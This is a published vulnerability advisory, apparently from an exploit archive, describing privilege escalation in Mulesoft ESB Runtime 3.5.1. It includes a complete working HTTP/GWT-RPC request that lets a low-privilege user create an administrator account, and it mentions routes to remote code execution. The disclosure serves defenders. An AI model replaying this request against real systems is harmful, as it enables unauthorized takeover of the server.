Mulesoft ESB Runtime 3.5.1 Privilege Escalation / Code Execution

2014.10.23
Credit: Brandon Perry
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-264

Mulesoft ESB Runtime 3.5.1 Authenticated Privilege Escalation ? Remote Code Execution Mulesoft ESB Runtime 3.5.1 allows any arbitrary authenticated user to create an administrator user due to a lack of permissions check in the handler/securityService.rpc endpoint. The following HTTP request can be made by any authenticated user, even those with a single role of Monitor. POST /mmc-3.5.1/handler/securityService.rpc HTTP/1.1 Host: 192.168.0.22:8585 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:31.0) Gecko/20100101 Firefox/31.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: text/x-gwt-rpc; charset=utf-8/ Referer: http://192.168.0.22:8585/mmc-3.5.1/index.jsp Content-Length: 503 Cookie: JSESSIONID=CEB49ED5E239CB7AB6B7C02DD83170A4; Connection: keep-alive Pragma: no-cache Cache-Control: no-cache 7|0|15|http://192.168.0.22:8585/mmc-3.5.1/com.mulesoft.mmc.MMC/ |5192695B02944BAAB195B91AB3FDDA48|org.mule.galaxy.web.rpc.RemoteSecurityService|addUser|org.mule.galaxy.web.rpc.WUser/4112688705|java.lang.String/2004016611| fdsafdsa@fdsafdsa.com |java.util.ArrayList/4159755760|298e8098-ff3e-4d13-b37e-3f3d33193ed9|ed4cbe90-085d-4d44-976c-436eb1d78d16|ccd8aee7-30bb-42e1-8218-cfd9261c7af9|d63c1710-e811-4c3c-aeb6-e474742ac084|fdsa|notadmin|notpassword|1|2|3|4|2|5|6|5|7|8|4|6|9|6|10|6|11|6|12|0|13|0|0|14|15| This request will create an administrator with all roles with a username of notadmin and a password of notpassword. Many vectors of remote code execution are available to an administrator. Not only can an administrator deploy WAR applications, they can also evaluate arbitrary groovy scripts via the web interface. -- http://volatile-minds.blogspot.com -- blog http://www.volatileminds.net -- website


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top